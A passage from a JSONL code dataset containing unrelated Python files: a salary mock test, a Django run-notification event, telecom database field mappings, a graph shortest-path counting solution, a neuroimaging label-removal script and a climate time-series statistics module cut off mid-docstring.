mock.patch('salary.ThirdPartyBonusRestApi.bonus_price')\r\n self.mock_bonus = self.patcher.start()\r\n\r\n def tearDown(self):\r\n self.patcher.stop()\r\n\r\n def test_calculation_salary_no_salary_patch_patcher(self):\r\n self.mock_bonus.return_value = 1\r\n\r\n s = salary.Salary(year=2017)\r\n salary_price = s.calculation_salary()\r\n\r\n self.assertEqual(salary_price, 101)\r\n self.mock_bonus.assert_called()\r\n\r\n def test_calculation_salary_no_salary_patch_side_effect(self):\r\n self.mock_bonus.side_effect = ConnectionRefusedError\r\n\r\n s = salary.Salary(year=2017)\r\n salary_price = s.calculation_salary()\r\n\r\n self.assertEqual(salary_price, 100)\r\n self.mock_bonus.assert_called()\r\n","sub_path":"test_salary.py","file_name":"test_salary.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"380080477","text":"import json\nfrom django.conf import settings\nfrom notifier.event_handler.event import Event\n\n\nclass RunFinishedEvent(Event):\n def __init__(\n self,\n job_notifier,\n request_id,\n run_id,\n pipeline,\n pipeline_version,\n pipeline_link,\n output_directory,\n run_status,\n tags,\n running,\n completed,\n failed,\n total,\n operator_run_id,\n lsf_log_location,\n input_json_location,\n job_group_id,\n ):\n self.job_notifier = job_notifier\n self.request_id = request_id\n self.pipeline = pipeline\n self.pipeline_version = pipeline_version\n self.pipeline_link = pipeline_link\n self.output_directory = output_directory\n self.run_id = run_id\n self.run_status = run_status\n self.tags = tags\n self.running = running\n self.completed = completed\n self.failed = failed\n self.total = total\n self.operator_run_id = operator_run_id\n self.lsf_log_location = lsf_log_location\n self.input_json_location = input_json_location\n self.job_group_id = job_group_id\n\n @classmethod\n def get_type(cls):\n return \"RunFinishedEvent\"\n\n @classmethod\n def get_method(cls):\n return \"process_run_completed\"\n\n def __str__(self):\n RUN_TEMPLATE = \"\"\"\n\n Run Id: {run_id}\n Pipeline: {pipeline_name}\n Pipeline Link: {pipeline_link}\n Output Directory: {output_directory}\n {tags}\n Status: {status}\n Link: {link}\n LSF Log Location: {lsf_log_location}\n inputs.json Location: {inputs_json_location}\n \n _____________________________________________\n \n {run_status}\n \n Running: {running}\n Completed: {completed}\n Failed: {failed}\n \n TOTAL: {total}\n \\n\n {rerun_info}\n \"\"\"\n link = \"%s%s%s\\n\" % (settings.BEAGLE_URL, \"/v0/run/api/\", self.run_id)\n if self.operator_run_id:\n status = \"OperatorRun {operator_run} status\".format(operator_run=self.operator_run_id)\n else:\n status = \"Run status\"\n tags = \"\"\n run_ids = None\n for k, v in self.tags.items():\n tags += f\"{k}: {json.dumps(v) if isinstance(v, list) or isinstance(v, dict) else str(v)}\\n\"\n if k == \"argos_run_ids\":\n run_ids = v\n\n rerun_json = {}\n rerun_json[\"pipelines\"] = [self.pipeline]\n rerun_json[\"pipeline_versions\"] = [self.pipeline_version]\n rerun_json[\"job_group_id\"] = self.job_group_id\n if run_ids:\n rerun_json[\"run_ids\"] = run_ids\n else:\n rerun_json[\"request_ids\"] = self.request_id\n\n if self.run_status == \"FAILED\":\n rerun_str = f\"\"\"\n API Body for re-run:\n \n {json.dumps(rerun_json)}\n \"\"\"\n else:\n rerun_str = \"\"\n\n return RUN_TEMPLATE.format(\n run_id=self.run_id,\n pipeline_name=self.pipeline,\n pipeline_link=self.pipeline_link,\n status=self.run_status,\n 
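The setUp/tearDown patcher pair fixed in the test_salary record above can also be collapsed with unittest's addCleanup, which runs even when setUp itself fails partway. A sketch against the record's own salary module:

import unittest
from unittest import mock

import salary

class TestSalaryCleanup(unittest.TestCase):
    def setUp(self):
        patcher = mock.patch('salary.ThirdPartyBonusRestApi.bonus_price')
        self.mock_bonus = patcher.start()
        self.addCleanup(patcher.stop)   # no tearDown needed

    def test_bonus_is_added(self):
        self.mock_bonus.return_value = 1
        self.assertEqual(salary.Salary(year=2017).calculation_salary(), 101)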
link=link,\n running=str(self.running),\n completed=str(self.completed),\n failed=str(self.failed),\n total=str(self.total),\n tags=tags,\n run_status=status,\n output_directory=self.output_directory,\n lsf_log_location=self.lsf_log_location,\n inputs_json_location=self.input_json_location,\n rerun_info=rerun_str,\n )\n","sub_path":"notifier/events/run_finished_event.py","file_name":"run_finished_event.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"132501426","text":"#首先定义字典,用于应相应的二级选项,主键对应页面选项,值对应数据库字段名\nusr_basic_info_dict ={\n \"ID\":\"ID\",\n \"手机号码\":\"MSISDN\",\n \"手机号注册城市\":\"CITY\",\n \"手机号注册区县\":\"AREA\",\n \"手机号注册乡镇\":\"AREA1\",\n \"农村城市属性\":\"OVERLAY_AREA\",\n \"用户星级\":\"STAR_TYPE\",\n \"入网时间\":\"START_DATE\",\n \"在网时长\":\"ONLINE_TIME\",\n \"号码归属地\":\"ATTRIB_ADDR\",\n}\nusr_expenses_dict={\n \"ID\":\"ID\",\n \"手机号码\":\"MSISDN\",\n \"主套餐名称\":\"PACKAGES_NAME\",\n \"是否500M以上流量或套餐订购用户\":\"UP_500M_USER\",\n \"主套餐加附加套餐包含流量\":\"FLOWS\",\n \"是否校园客户\":\"COLLEGE_USER\",\n \"是否超套餐流量用户\":\"OVER_PACKGES_USER\",\n \"近三个月月均ARPU\":\"LAST3M_AVG_ARPU\",\n \"近三个月月均DOU\":\"LAST3M_AVG_DOU\"\n}\nusr_location={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"用户经度\":\"LONGITUDE\",\n \"用户纬度\":\"LATITUDE\",\n \"用户常驻小区\":\"CELL\",\n}\ntac_imei_relation={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"终端品牌\":\"BRAND\",\n \"终端型号\":\"TYPE\",\n}\nusr_app_pecpt={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"TOP1APP名称\":\"TOP1_APP_NAME\",\n \"TOP2APP名称\":\"TOP2_APP_NAME\",\n \"TOP3APP名称\":\"TOP3_APP_NAME\",\n \"TOP4APP名称\":\"TOP4_APP_NAME\",\n \"TOP5APP名称\":\"TOP5_APP_NAME\"\n}\nusr_app_rank={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"TOP1APP名称\": \"TOP1_APP_NAME\",\n \"TOP2APP名称\": \"TOP2_APP_NAME\",\n \"TOP3APP名称\": \"TOP3_APP_NAME\",\n \"TOP4APP名称\": \"TOP4_APP_NAME\",\n \"TOP5APP名称\": \"TOP5_APP_NAME\",\n \"TOP1APP流量\":\"TOP1_DATA\",\n \"TOP2APP流量\":\"TOP2_DATA\",\n \"TOP3APP流量\":\"TOP3_DATA\",\n \"TOP4APP流量\":\"TOP4_DATA\",\n \"TOP5APP流量\":\"TOP5_DATA\",\n}\nusr_cover_pecpt={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"MR采样点\":\"SUM_POINT\",\n \"MR弱采样点\":\"POOR_POINT\",\n \"低于-100的采样点\":\"WEAK_POINT\",\n \"平均RSRP\":\"AVG_RSRP\",\n \"大于-100的覆盖率\":\"MR_RATE_100\",\n \"MR覆盖率\":\"MR_RATE\",\n \"脱网率\":\"OFF_RATE\",\n \"差PHR率\":\"BAD_PHR_RATE\",\n}\nusr_complt_record={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"是否离网预警用户\":\"IF_RISK_USER\",\n \"离网预警原因\":\"POLICY_PRODUCT\",\n \"是否投诉用户\":\"IF_COMPLAINT_USER\",\n \"投诉原因1\":\"REASON1\",\n \"投诉原因2\":\"REASON2\",\n \"投诉业务\":\"BUSINESS\",\n \"是否不满意用户\":\"IF_DISCONTENT_USER\",\n \"不满意原因\":\"RFD\",\n \"维系措施\":\"DFW\",\n \"是否校园客户\":\"COLLEGE_USR\",\n \"超套餐流量客户\":\"OVER_PACKGES_USER\"\n}\nusr_call_pecpt={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"寻呼成功率\":\"PAGING_RATE\",\n \"掉话率\":\"DC_RATE\",\n}\nusr_speed_pecpt={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"全业务下行速率\":\"DL_SPEED\",\n \"大包下行速率\":\"BP_DL_SPEED\",\n \"大包下行流量\":\"BP_DL_DATA\",\n \"大包下行时长\":\"BP_DL_DURA\",\n \"全业务上行速率\":\"UL_SPEED\",\n \"大包上行速率\":\"BP_UL_SPEED\",\n \"小包下行速率\":\"SP_DL_DELAY\",\n \"小包上行速率\":\"SP_UL_DELAY\",\n}\nusr_ete_pecpt={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"HTTP响应成功率\":\"HTTP_RES_RATE\",\n \"HTTP请求次数\":\"HTTP_ATT\",\n \"HTTP响应时延\":\"HTTP_RES_DELAY\",\n \"TCP核心网成功率\":\"TCP_CORE_RATE\",\n \"TCP核心网时延\":\"TCP_CORE_DELAY \",\n \"TCP无线成功率\":\"TCP_RADIO_RATE\",\n \"TCP无线时延\":\"TCP_RADIO_DELAY\",\n \"TCP下行重传率\":\"TCP_DL_RE_RATE\",\n \"TCP上行重传率\":\"TCP_UL_RE_RATE\",\n 
\"TCP重传率\":\"TCP_RE_RATE\",\n \"页面响应时延\":\"PAGE_RES_DELAY\",\n \"页面响应次数\":\"PAGE_RES_SESSION\",\n}\nusr_core_pecpt={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"差RIP率\":\"BAD_RIP_RATE\",\n \"切换成功率\":\"HO_RATE\",\n \"服务请求成功率\":\"SR_RATE\",\n \"附着成功率\":\"ATTACH_RATE\",\n \"PDN连接成功率\":\"PDN_RATE\",\n \"INITIAL成功率\":\"INITIAL_RATE\",\n \"TAU成功率\":\"TAU_RATE\",\n}\n\ntable_dict={\n \"用户基本信息表\":usr_basic_info_dict,\n \"用户消费情况表\":usr_expenses_dict,\n \"用户位置情况表\":usr_location,\n \"用户终端情况表\":tac_imei_relation,\n \"用户APP感知表\":usr_app_pecpt,\n \"用户APP偏好表\":usr_app_rank,\n \"用户覆盖感知表\":usr_cover_pecpt,\n \"用户投诉记录表\":usr_complt_record,\n \"用户通话情况表\":usr_call_pecpt,\n \"用户速率感知表\":usr_speed_pecpt,\n \"用户端到端情况表\":usr_ete_pecpt,\n \"用户核心网感知表\":usr_core_pecpt,\n};\n\n#表的字典,对应不同的不同的表名\ntable_name_dict={\n \"用户基本信息表\":\"usr_basic_info\",\n \"用户消费情况表\":\"usr_expenses\",\n \"用户位置情况表\":\"usr_location\",\n \"用户终端情况表\":\"tac_imei_relation\",\n \"用户APP感知表\":\"usr_app_pecpt\",\n \"用户APP偏好表\":\"usr_app_rank\",\n \"用户覆盖感知表\":\"usr_cover_pecpt\",\n \"用户投诉记录表\":\"usr_complt_record\",\n \"用户通话情况表\":\"usr_call_pecpt\",\n \"用户速率感知表\":\"usr_speed_pecpt\",\n \"用户端到端情况表\":\"usr_ete_pecpt\",\n \"用户核心网感知表\":\"usr_core_pecpt\",\n};\n#以下将使用各种规则\nbijiao={\n \"等于\":\"=\",\n \"大于\":\">\",\n \"小于\":\"<\",\n}\nget_value={\n \"计数\":\"\",\n \"求和\":\"\",\n \"求平均值\":\"\",\n \"求方差\":\"\",\n}\n\ndef a(r):\n if r:\n print(\"good\");\n return\n print(\"bad\");\n return;\n\na(False);\n\n","sub_path":"user/db_data.py","file_name":"db_data.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"292980089","text":"from collections import deque\n\nN, M = map(int, input().split())\nMOD = 10**9 + 7\nINF = float(\"inf\")\n\ng = [[] for _ in range(N)]\nalready = [False for _ in range(N)]\nnum = [0 for _ in range(N)]\nnum[0] += 1\ncosts = [INF for _ in range(N)]\n\nqueue = deque()\n\nfor _ in range(M):\n tmp = list(map(int, input().split()))\n g[tmp[0]-1].append(tmp[1]-1)\n g[tmp[1]-1].append(tmp[0]-1)\n\nqueue.append([0, 0])\n\nwhile queue:\n now, cost = queue.popleft()\n \n if N-1 == now:\n break\n if already[now]:\n continue\n already[now] = True\n \n for i in g[now]:\n if costs[i] > cost:\n costs[i] = cost\n num[i] = num[now]\n num[i] %= MOD\n queue.append([i, cost+1])\n elif costs[i] == cost:\n num[i] += num[now]\n num[i] %= MOD\n\nprint(num[N-1])\n ","sub_path":"contest/abc211/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"232007449","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n Script to remove specific labels from a atlas volumes.\n\n >>> scil_remove_labels.py DKT_labels.nii out_labels.nii.gz -i 5001 5002\n\"\"\"\n\n\nimport argparse\nimport logging\n\nimport nibabel as nib\nimport numpy as np\n\nfrom scilpy.io.image import get_data_as_label\nfrom scilpy.io.utils import (add_overwrite_arg, assert_inputs_exist,\n assert_outputs_exist)\nEPILOG = \"\"\"\n References:\n [1] Al-Sharif N.B., St-Onge E., Vogel J.W., Theaud G.,\n Evans A.C. and Descoteaux M. 
OHBM 2019.\n Surface integration for connectome analysis in age prediction.\n \"\"\"\n\n\ndef _build_arg_parser():\n p = argparse.ArgumentParser(description=__doc__, epilog=EPILOG,\n formatter_class=argparse.RawTextHelpFormatter)\n\n p.add_argument('in_labels',\n help='Input labels volume.')\n\n p.add_argument('out_labels',\n help='Output labels volume.')\n\n p.add_argument('-i', '--indices', type=int, nargs='+', required=True,\n help='List of label indices to remove.')\n\n p.add_argument('--background', type=int, default=0,\n help='Integer used for removed labels [%(default)s].')\n add_overwrite_arg(p)\n return p\n\n\ndef main():\n parser = _build_arg_parser()\n args = parser.parse_args()\n\n assert_inputs_exist(parser, args.in_labels)\n assert_outputs_exist(parser, args, args.out_labels)\n\n # Load volume\n label_img = nib.load(args.in_labels)\n labels_volume = get_data_as_label(label_img)\n\n # Remove given labels from the volume\n for index in np.unique(args.indices):\n mask = labels_volume == index\n labels_volume[mask] = args.background\n if np.count_nonzero(mask) == 0:\n logging.warning(\"Label {} was not in the volume\".format(index))\n\n # Save final volume\n nii = nib.Nifti1Image(labels_volume, label_img.affine, label_img.header)\n nib.save(nii, args.out_labels)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/scil_remove_labels.py","file_name":"scil_remove_labels.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"138268458","text":"\"\"\"Objects dealing with timeseries and ensemble statistics.\"\"\"\nimport numpy as np\nimport numpy.polynomial.polynomial as poly\nimport scipy.stats as ss\nimport xarray as xr\nfrom scipy.signal import periodogram\nfrom scipy.stats import norm\n\nfrom xskillscore import pearson_r, pearson_r_p_value\n\n\n# --------------------------------------------#\n# HELPER FUNCTIONS\n# Should only be used internally by esmtools.\n# --------------------------------------------#\ndef _check_xarray(x):\n \"\"\"Check if the object being submitted is either a Dataset or DataArray.\"\"\"\n if not (isinstance(x, xr.DataArray) or isinstance(x, xr.Dataset)):\n typecheck = type(x)\n raise IOError(f\"\"\"The input data is not an xarray object (an xarray\n DataArray or Dataset). esmtools is built to wrap xarray to make\n use of its awesome features. Please input an xarray object and\n retry the function.\n\n Your input was of type: {typecheck}\"\"\")\n\n\ndef _get_coords(da):\n return list(da.coords)\n\n\ndef _get_dims(da):\n return list(da.dims)\n\n\ndef _get_vars(ds):\n return list(ds.data_vars)\n\n\n# ----------------------------------#\n# TIME SERIES\n# Functions related to time series.\n# ----------------------------------#\ndef xr_corr(x, y, dim='time', lag=0, return_p=False):\n \"\"\"Computes the Pearson product-moment coefficient of linear correlation.\n\n This version calculates the effective degrees of freedom, accounting\n for autocorrelation within each time series that could fluff the\n significance of the correlation.\n\n References:\n * Wilks, Daniel S. Statistical methods in the atmospheric sciences.\n Vol. 100. Academic press, 2011.\n * Lovenduski, Nicole S., and Nicolas Gruber. 
\"Impact of the Southern\n Annular Mode on Southern Ocean circulation and biology.\" Geophysical\n Research Letters 32.11 (2005).\n\n Todo:\n * Test and adapt for xr.Datasets\n\n Args:\n x (xarray object): Independent variable time series or grid of time\n series.\n y (xarray object): Dependent variable time series or grid of time\n series\n dim (optional str): Correlation dimension\n lag (optional int): Lag to apply to correlaton, with x predicting y.\n return_p (optional bool): If True, return correlation coefficients\n as well as p values.\n Returns:\n Pearson correlation coefficients\n\n If return_p True, associated p values.\n\n \"\"\"\n _check_xarray(x)\n _check_xarray(y)\n if lag != 0:\n N = x[dim].size\n normal = x.isel({dim: slice(0, N-lag)})\n shifted = y.isel({dim: slice(0 + lag, N)})\n if dim not in list(x.coords):\n normal[dim] = np.arange(1, N)\n shifted[dim] = normal[dim]\n r = pearson_r(normal, shifted, dim)\n else:\n r = pearson_r(x, y, dim)\n if return_p:\n p = _xr_eff_p_value(x, y, r, dim)\n # return with proper dimension labeling. would be easier with\n # apply_ufunc, but having trouble getting it to work here. issue\n # probably has to do with core dims.\n dimlist = _get_dims(r)\n for i in range(len(dimlist)):\n p = p.rename({'dim_' + str(i): dimlist[i]})\n return r, p\n else:\n return r\n\n\ndef _xr_eff_p_value(x, y, r, dim):\n \"\"\"Computes p values accounting for autocorrelation in time series.\n\n Args:\n x (xarray object): Independent time series.\n y (xarray object): Dependent time series.\n r (xarray object): Pearson correlations between x and y.\n dim (str): Dimension to compute compute p values over.\n\n Returns:\n p values accounting for autocorrelation in input time series.\n\n References:\n * Wilks, Daniel S. Statistical methods in the atmospheric sciences.\n Vol. 100. 
Academic press, 2011.\n \"\"\"\n def _compute_autocorr(v, dim, n):\n \"\"\"\n Return normal and shifted time series\n with equal dimensions so as not to\n throw an error.\n \"\"\"\n shifted = v.isel({dim: slice(1, n)})\n normal = v.isel({dim: slice(0, n-1)})\n # see explanation in xr_autocorr for this\n if dim not in list(v.coords):\n normal[dim] = np.arange(1, n)\n shifted[dim] = normal[dim]\n return pearson_r(shifted, normal, dim)\n\n n = x[dim].size\n # find autocorrelation\n xa, ya = x - x.mean(dim), y - y.mean(dim)\n xauto = _compute_autocorr(xa, dim, n)\n yauto = _compute_autocorr(ya, dim, n)\n # compute effective sample size\n n_eff = n * (1 - xauto * yauto) / (1 + xauto * yauto)\n n_eff = np.floor(n_eff)\n # constrain n_eff to be at maximum the total number of samples\n n_eff = n_eff.where(n_eff <= n, n)\n # compute t-statistic\n t = r * np.sqrt((n_eff - 2) / (1 - r**2))\n p = xr.DataArray(ss.t.sf(np.abs(t), n_eff - 2) * 2)\n return p\n\n\ndef xr_rm_poly(ds, order, dim='time'):\n \"\"\"Returns xarray object with nth-order fit removed.\n\n Args:\n ds (xarray object): Time series to be detrended.\n order (int): Order of polynomial fit to be removed.\n dim (optional str): Dimension over which to remove the polynomial fit.\n\n Returns:\n xarray object with polynomial fit removed.\n \"\"\"\n _check_xarray(ds) # this could be a decorator I think?\n\n if dim not in ds.dims:\n raise KeyError(\n f\"Input dim, '{dim}', was not found in the ds; \"\n f\"found only the following dims: {list(ds.dims)}.\"\n )\n\n # handle both datasets and dataarray\n if isinstance(ds, xr.Dataset):\n da = ds.to_array()\n return_ds = True\n else:\n da = ds.copy()\n return_ds = False\n\n da_dims_orig = list(da.dims) # orig -> original\n if len(da_dims_orig) > 1:\n # want independent axis to be the leading dimension\n da_dims_swap = da_dims_orig.copy() # copy to prevent contamination\n\n # https://stackoverflow.com/questions/1014523/\n # simple-syntax-for-bringing-a-list-element-to-the-front-in-python\n da_dims_swap.insert(0, da_dims_swap.pop(da_dims_swap.index(dim)))\n da = da.transpose(*da_dims_swap)\n\n # hide other dims into a single dim\n da = da.stack({'other_dims': da_dims_swap[1:]})\n dims_swapped = True\n else:\n dims_swapped = False\n\n # NaNs will make the polyfit fail--interpolate any NaNs in\n # the provided dim to prevent poor fit, while other dims' NaNs\n # will be filled with 0s; however, all NaNs will be replaced\n # in the final output\n nan_locs = np.isnan(da.values)\n\n # any(nan_locs.sum(axis=0)) fails if not 2D\n if nan_locs.ndim == 1:\n nan_locs = nan_locs.reshape(len(nan_locs), 1)\n nan_reshaped = True\n else:\n nan_reshaped = False\n\n # check if there's any NaNs in the provided dim because\n # interpolate_na is computationally expensive to run regardless of NaNs\n if any(nan_locs.sum(axis=0)) > 0:\n if any(nan_locs[0, :]):\n # [np.nan, 1, 2], no first value to interpolate from; back fill\n da = da.bfill(dim)\n elif any(nan_locs[-1, :]):\n # [0, 1, np.nan], no last value to interpolate from; forward fill\n da = da.ffill(dim)\n else: # [0, np.nan, 2], can interpolate\n da = da.interpolate_na(dim)\n\n # this handles the other axes; doesn't matter since it won't affect the fit\n da = da.fillna(0)\n\n # the actual operation of detrending\n y = da.values\n x = np.arange(0, len(y), 1)\n coefs = poly.polyfit(x, y, order)\n fit = poly.polyval(x, coefs)\n y_dt = y - fit.transpose() # dt -> detrended\n da.data[:] = y_dt\n\n # replace back the filled NaNs (keep values where not NaN)\n if 
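A plain-NumPy restatement of the effective-sample-size correction that `_xr_eff_p_value` implements above (same Wilks 2011 formulas, scalar inputs), useful for eyeballing how autocorrelation inflates p values:

import numpy as np
from scipy import stats

def eff_p_value(r, r1_auto, r2_auto, n):
    # Shrink the sample size by the lag-1 autocorrelation of both series,
    # then run the usual two-sided t-test on the correlation r.
    n_eff = np.floor(n * (1 - r1_auto * r2_auto) / (1 + r1_auto * r2_auto))
    n_eff = min(n_eff, n)
    t = r * np.sqrt((n_eff - 2) / (1 - r**2))
    return 2 * stats.t.sf(abs(t), n_eff - 2)

# Strong autocorrelation yields a larger p than the naive test:
print(eff_p_value(0.4, 0.8, 0.8, 100))
print(eff_p_value(0.4, 0.0, 0.0, 100))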
nan_reshaped:\n nan_locs = nan_locs[:, 0]\n da = da.where(~nan_locs)\n\n if dims_swapped:\n # revert the other dimensions to its original form and ordering\n da = da.unstack('other_dims').transpose(*da_dims_orig)\n\n if return_ds:\n # revert back into a dataset\n return xr.merge(da.sel(variable=var).rename(var).drop('variable')\n for var in da['variable'].values)\n else:\n return da\n\n\ndef xr_rm_trend(da, dim='time'):\n \"\"\"Calls ``xr_rm_poly`` with an order 1 argument.\"\"\"\n return xr_rm_poly(da, 1, dim=dim)\n\n\n# # TODO: coords lon, lat get lost for curvilinear ds\ndef xr_varweighted_mean_period(ds, time_dim='time'):\n \"\"\"Calculate the variance weighted mean period of time series.\n\n ..math:\n P_x = \\sum_k V(f_k,x) / \\sum_k f_k V(f_k,x)\n\n Reference:\n * Branstator, Grant, and Haiyan Teng. “Two Limits of Initial-Value\n Decadal Predictability in a CGCM.\" Journal of Climate 23, no. 23\n (August 27, 2010): 6292-6311. https://doi.org/10/bwq92h.\n\n Args:\n ds (xarray object): Time series.\n time_dim (optional str): Name of time dimension.\n\n \"\"\"\n _check_xarray(ds)\n\n def _create_dataset(ds, f, Pxx, time_dim):\n \"\"\"\n Organize results of periodogram into clean dataset.\n \"\"\"\n dimlist = [i for i in _get_dims(ds) if i not in [time_dim]]\n PSD = xr.DataArray(Pxx, dims=['freq'] + dimlist)\n PSD.coords['freq'] = f\n return PSD\n\n f, Pxx = periodogram(ds, axis=0, scaling='spectrum')\n PSD = _create_dataset(ds, f, Pxx, time_dim)\n T = PSD.sum('freq') / ((PSD * PSD.freq).sum('freq'))\n return T\n\n\ndef xr_autocorr(ds, lag=1, dim='time', return_p=False):\n \"\"\"Calculate the lagged correlation of time series.\n\n Args:\n ds (xarray object): Time series or grid of time series.\n lag (optional int): Number of time steps to lag correlate to.\n dim (optional str): Name of dimension to autocorrelate over.\n return_p (optional bool): If True, return correlation coefficients\n and p values.\n\n Returns:\n Pearson correlation coefficients.\n\n If return_p, also returns their associated p values.\n \"\"\"\n _check_xarray(ds)\n N = ds[dim].size\n normal = ds.isel({dim: slice(0, N - lag)})\n shifted = ds.isel({dim: slice(0 + lag, N)})\n \"\"\"\n xskillscore pearson_r looks for the dimensions to be matching, but we\n shifted them so they probably won't be. This solution doesn't work\n if the user provides a dataset without a coordinate for the main\n dimension, so we need to create a dummy dimension in that case.\n \"\"\"\n if dim not in list(ds.coords):\n normal[dim] = np.arange(1, N)\n shifted[dim] = normal[dim]\n r = pearson_r(normal, shifted, dim)\n if return_p:\n # NOTE: This assumes 2-tailed. Need to update xr_eff_pearsonr\n # to utilize xskillscore's metrics but then compute own effective\n # p-value with option for one-tailed.\n p = pearson_r_p_value(normal, shifted, dim)\n return r, p\n else:\n return r\n\n\ndef xr_decorrelation_time(da, r=20, dim='time'):\n \"\"\"Calculate the decorrelaton time of a time series.\n\n .. math::\n tau_{d} = 1 + 2 * \\sum_{k=1}^{\\inf}(alpha_{k})^{k}\n\n Reference:\n * Storch, H. v, and Francis W. Zwiers. Statistical Analysis in Climate\n Research. 
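A quick usage check of `xr_rm_poly`/`xr_rm_trend` from this record on a synthetic linear trend (assuming the module above is importable as written):

import numpy as np
import xarray as xr

t = np.arange(120)
da = xr.DataArray(0.05 * t + np.random.randn(120), dims=['time'],
                  coords={'time': t})
detrended = xr_rm_poly(da, 1, dim='time')   # equivalent to xr_rm_trend(da)
print(float(detrended.mean()))              # ~0 once the linear fit is removed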
Cambridge ; New York: Cambridge University Press, 1999.,\n p.373\n\n Args:\n da (xarray object): Time series.\n r (optional int): Number of iterations to run the above formula.\n dim (optional str): Time dimension for xarray object.\n\n Returns:\n Decorrelation time of time series.\n\n \"\"\"\n _check_xarray(da)\n one = da.mean(dim) / da.mean(dim)\n return one + 2 * xr.concat([xr_autocorr(da, dim=dim, lag=i) ** i for i in\n range(1, r)], 'it').sum('it')\n\n\n# --------------------------------------------#\n# Diagnostic Potential Predictability (DPP)\n# Functions related to DPP from Boer et al.\n# --------------------------------------------#\n# # TODO: coords lon, lat get lost for curvilinear ds\ndef DPP(ds, m=10, chunk=True):\n \"\"\"\n Calculate Diagnostic Potential Predictability (DPP) as potentially\n predictable variance fraction (ppvf) in Boer 2004.\n\n Note: Resplandy et al. 2015 and Seferian et al. 2018 calculate unbiased DPP\n in a slightly different way. chunk=False\n\n .. math::\n\n DPP_{\\text{unbiased}}(m)=\\frac{\\sigma^2_m - 1/m \\cdot \\sigma^2}{\\sigma^2}\n\n References:\n * Boer, G. J. “Long Time-Scale Potential Predictability in an Ensemble of\n Coupled Climate Models.” Climate Dynamics 23, no. 1 (August 1, 2004):\n 29–44. https://doi.org/10/csjjbh.\n * Resplandy, L., R. Séférian, and L. Bopp. “Natural Variability of CO2 and\n O2 Fluxes: What Can We Learn from Centuries-Long Climate Models\n Simulations?” Journal of Geophysical Research: Oceans 120, no. 1\n (January 2015): 384–404. https://doi.org/10/f63c3h.\n * Séférian, Roland, Sarah Berthet, and Matthieu Chevallier. “Assessing the\n Decadal Predictability of Land and Ocean Carbon Uptake.” Geophysical\n Research Letters, March 15, 2018. https://doi.org/10/gdb424.\n\n Args:\n ds (xr.DataArray): control simulation with time dimension as years.\n m (optional int): separation time scale in years between predictable\n low-freq component and high-freq noise.\n chunk (optional boolean): Whether chunking is applied. 
Default: True.\n If False, then uses Resplandy 2015 / Seferian 2018 method.\n\n Returns:\n dpp (xr.DataArray): ds without time dimension.\n\n \"\"\"\n # TODO: rename or find xr equiv\n def _chunking(ds, number_chunks=False, chunk_length=False):\n \"\"\"\n Separate data into chunks and reshapes chunks in a c dimension.\n\n Specify either the number chunks or the length of chunks.\n Needed for DPP.\n\n Args:\n ds (xr.DataArray): control simulation with time dimension as years.\n chunk_length (int): see DPP(m)\n number_chunks (int): number of chunks in the return data.\n\n Returns:\n c (xr.DataArray): chunked ds, but with additional dimension c.\n\n \"\"\"\n if number_chunks and not chunk_length:\n chunk_length = np.floor(ds['time'].size / number_chunks)\n cmin = int(ds['time'].min())\n elif not number_chunks and chunk_length:\n cmin = int(ds['time'].min())\n number_chunks = int(np.floor(ds['time'].size / chunk_length))\n else:\n raise ValueError('set number_chunks or chunk_length to True')\n c = ds.sel(time=slice(cmin, cmin + chunk_length - 1))\n c = c.expand_dims('c')\n c['c'] = [0]\n for i in range(1, number_chunks):\n c2 = ds.sel(time=slice(cmin + chunk_length * i,\n cmin + (i + 1) * chunk_length - 1))\n c2 = c2.expand_dims('c')\n c2['c'] = [i]\n c2['time'] = c['time']\n c = xr.concat([c, c2], 'c')\n return c\n\n if not chunk: # Resplandy 2015, Seferian 2018\n s2v = ds.rolling(time=m).mean().var('time')\n s2 = ds.var('time')\n\n if chunk: # Boer 2004 ppvf\n # first chunk\n chunked_means = _chunking(\n ds, chunk_length=m).mean('time')\n # sub means in chunks\n chunked_deviations = _chunking(\n ds, chunk_length=m) - chunked_means\n s2v = chunked_means.var('c')\n s2e = chunked_deviations.var(['time', 'c'])\n s2 = s2v + s2e\n dpp = (s2v - s2 / (m)) / s2\n return dpp\n\n\n# -------\n# Z SCORE\n# -------\ndef _z_score(ci):\n \"\"\"Returns critical z score given a confidence interval\n\n Source: https://stackoverflow.com/questions/20864847/\n probability-to-z-score-and-vice-versa-in-python\n \"\"\"\n diff = (100 - ci) / 2\n return norm.ppf((100 - diff) / 100)\n\n\ndef z_significance(r1, r2, N, ci=90):\n \"\"\"Computes the z test statistic for two ACC time series, e.g. an\n initialized ensemble ACC and persistence forecast ACC.\n\n Inputs:\n r1, r2: (xarray objects) time series, grids, etc. 
